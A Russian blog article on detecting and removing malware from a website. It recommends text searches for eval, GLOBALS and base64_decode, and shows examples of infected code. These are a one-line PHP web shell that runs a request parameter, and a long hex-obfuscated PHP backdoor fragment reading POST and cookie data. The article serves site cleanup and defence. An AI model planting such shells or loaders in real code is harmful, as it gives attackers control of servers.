Ищем и удаляем вирусы на сайте

Обновлено: 23 декабря, 2021

Для поиска вируса на сайте необходимо скачать копию сайта на локальный диск, и с помощью команды “Поиск по тексту” в Total Commander поискать файлы с входждением – eval, GLOBALS.

Также, следует обратить внимание на даты последнего изменения папок и файлов на сервере.

Вирусные файлы могут содержать строку наподобие этой

eval(stripslashes($_REQUEST[cmd]));

Также зараженный файл можно поискать по вхождению:

base64_decode

Также страница-вирус может выглядеть следующим образом:

${“\x47\x4c\x4fB\x41\x4c\x53”}[‘e84a’] = “\x2d\x28\x4f\x5a\x4e\x6c\x26\x6f\x5b\x4b\x75\x7b\x41\x7a\x67\x20\x70\x27\x6d\x53\x79\x3b\x2f\x68\x34\x22\x25\x23\x33\x5c\x32\x51\x3a\x46\x2a\x45\x29\x38\x44\x50\x30\x63\x76\x57\x31\x24\x48\x52\x56\x4a\x71\x78\x54\x9\x62\x3c\x21\x6a\x58\x7e\x3f\x4c\x64\x74\x5d\x3d\x2c\x72\x35\x2e\x7d\x6b\x5f\x43\x7c\x66\x77\x61\x36\x37\x2b\x40\x73\x47\x3e\xd\x55\x69\x39\x59\x49\x60\x6e\x5e\xa\x42\x65\x4d”;
$GLOBALS[$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][24].$GLOBALS[‘e84a’][28].$GLOBALS[‘e84a’][44].$GLOBALS[‘e84a’][41].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][88].$GLOBALS[‘e84a’][28]] = $GLOBALS[‘e84a’][41].$GLOBALS[‘e84a’][23].$GLOBALS[‘e84a’][67];
$GLOBALS[$GLOBALS[‘e84a’][54].$GLOBALS[‘e84a’][30].$GLOBALS[‘e84a’][41].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][37]] = $GLOBALS[‘e84a’][7].$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][62];
$GLOBALS[$GLOBALS[‘e84a’][54].$GLOBALS[‘e84a’][62].$GLOBALS[‘e84a’][30].$GLOBALS[‘e84a’][24].$GLOBALS[‘e84a’][30]] = $GLOBALS[‘e84a’][82].$GLOBALS[‘e84a’][63].$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][5].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][92];
$GLOBALS[$GLOBALS[‘e84a’][75].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][30].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][28]] = $GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][92].$GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][72].$GLOBALS[‘e84a’][82].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][63];
$GLOBALS[$GLOBALS[‘e84a’][14].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][54]] = $GLOBALS[‘e84a’][82].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][5].$GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][13].$GLOBALS[‘e84a’][96];
$GLOBALS[$GLOBALS[‘e84a’][71].$GLOBALS[‘e84a’][24].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][40].$GLOBALS[‘e84a’][41].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][79]] = $GLOBALS[‘e84a’][16].$GLOBALS[‘e84a’][23].$GLOBALS[‘e84a’][16].$GLOBALS[‘e84a’][42].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][82].$GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][7].$GLOBALS[‘e84a’][92];
$GLOBALS[$GLOBALS[‘e84a’][51].$GLOBALS[‘e84a’][30].$GLOBALS[‘e84a’][41].$GLOBALS[‘e84a’][37].$GLOBALS[‘e84a’][88].$GLOBALS[‘e84a’][24].$GLOBALS[‘e84a’][44].$GLOBALS[‘e84a’][79]] = $GLOBALS[‘e84a’][10].$GLOBALS[‘e84a’][92].$GLOBALS[‘e84a’][82].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][5].$GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][13].$GLOBALS[‘e84a’][96];
$GLOBALS[$GLOBALS[‘e84a’][76].$GLOBALS[‘e84a’][88].$GLOBALS[‘e84a’][75].$GLOBALS[‘e84a’][78]] = $GLOBALS[‘e84a’][54].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][82].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][78].$GLOBALS[‘e84a’][24].$GLOBALS[‘e84a’][72].$GLOBALS[‘e84a’][62].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][41].$GLOBALS[‘e84a’][7].$GLOBALS[‘e84a’][62].$GLOBALS[‘e84a’][96];
$GLOBALS[$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][79].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][54]] = $GLOBALS[‘e84a’][82].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][63].$GLOBALS[‘e84a’][72].$GLOBALS[‘e84a’][63].$GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][18].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][72].$GLOBALS[‘e84a’][5].$GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][18].$GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][63];
$GLOBALS[$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][41].$GLOBALS[‘e84a’][88].$GLOBALS[‘e84a’][37].$GLOBALS[‘e84a’][41].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][54].$GLOBALS[‘e84a’][30]] = $GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][62].$GLOBALS[‘e84a’][54].$GLOBALS[‘e84a’][78].$GLOBALS[‘e84a’][96];
$GLOBALS[$GLOBALS[‘e84a’][20].$GLOBALS[‘e84a’][30].$GLOBALS[‘e84a’][40].$GLOBALS[‘e84a’][28]] = $GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][37].$GLOBALS[‘e84a’][40].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][79].$GLOBALS[‘e84a’][40];
$GLOBALS[$GLOBALS[‘e84a’][10].$GLOBALS[‘e84a’][75].$GLOBALS[‘e84a’][78].$GLOBALS[‘e84a’][79].$GLOBALS[‘e84a’][78].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][62].$GLOBALS[‘e84a’][75]] = $_POST;
$GLOBALS[$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][78].$GLOBALS[‘e84a’][78].$GLOBALS[‘e84a’][41].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][54].$GLOBALS[‘e84a’][30].$GLOBALS[‘e84a’][44]] = $_COOKIE;
@$GLOBALS[$GLOBALS[‘e84a’][75].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][30].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][28]]($GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][7].$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][72].$GLOBALS[‘e84a’][5].$GLOBALS[‘e84a’][7].$GLOBALS[‘e84a’][14], NULL);
@$GLOBALS[$GLOBALS[‘e84a’][75].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][30].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][28]]($GLOBALS[‘e84a’][5].$GLOBALS[‘e84a’][7].$GLOBALS[‘e84a’][14].$GLOBALS[‘e84a’][72].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][7].$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][82], 0);
@$GLOBALS[$GLOBALS[‘e84a’][75].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][30].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][28]]($GLOBALS[‘e84a’][18].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][51].$GLOBALS[‘e84a’][72].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][51].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][41].$GLOBALS[‘e84a’][10].$GLOBALS[‘e84a’][63].$GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][7].$GLOBALS[‘e84a’][92].$GLOBALS[‘e84a’][72].$GLOBALS[‘e84a’][63].$GLOBALS[‘e84a’][87].$GLOBALS[‘e84a’][18].$GLOBALS[‘e84a’][96], 0);
@$GLOBALS[$GLOBALS[‘e84a’][67].$GLOBALS[‘e84a’][79].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][54]](0);

$iac3b21e = NULL;
$oeb054e8 = NULL;

$GLOBALS[$GLOBALS[‘e84a’][50].$GLOBALS[‘e84a’][88].$GLOBALS[‘e84a’][40].$GLOBALS[‘e84a’][88].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][78].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][44].$GLOBALS[‘e84a’][54]] = $GLOBALS[‘e84a’][75].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][41].$GLOBALS[‘e84a’][75].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][40].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][0].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][77].$GLOBALS[‘e84a’][75].$GLOBALS[‘e84a’][37].$GLOBALS[‘e84a’][0].$GLOBALS[‘e84a’][24].$GLOBALS[‘e84a’][30].$GLOBALS[‘e84a’][28].$GLOBALS[‘e84a’][78].$GLOBALS[‘e84a’][0].$GLOBALS[‘e84a’][88].$GLOBALS[‘e84a’][79].$GLOBALS[‘e84a’][37].$GLOBALS[‘e84a’][40].$GLOBALS[‘e84a’][0].$GLOBALS[‘e84a’][54].$GLOBALS[‘e84a’][28].$GLOBALS[‘e84a’][96].$GLOBALS[‘e84a’][44].$GLOBALS[‘e84a’][75].$GLOBALS[‘e84a’][68].$GLOBALS[‘e84a’][37].$GLOBALS[‘e84a’][28].$GLOBALS[‘e84a’][75].$GLOBALS[‘e84a’][88].$GLOBALS[‘e84a’][37].$GLOBALS[‘e84a’][88];
global $q909a651b;

Если вы встретили что-то подобное, на 99% это вирус. Сравните этот файл с изначальной версией файла: если такого файла вообще не было – его можно смело удалять, если он был – следует заменить текущий файл на изначальную версию.

ВНИМАНИЕ! Данный материал носит чисто ознакомительный характер, и призван к принятию дополнительных мер по обеспечению безопасности сайтов и информационных систем.

Рейтинг автора

Автор статьи

Юрий

SEO-аналитик, программист (PHP, Ajax, Delphi, MySQL).

Написано статей

268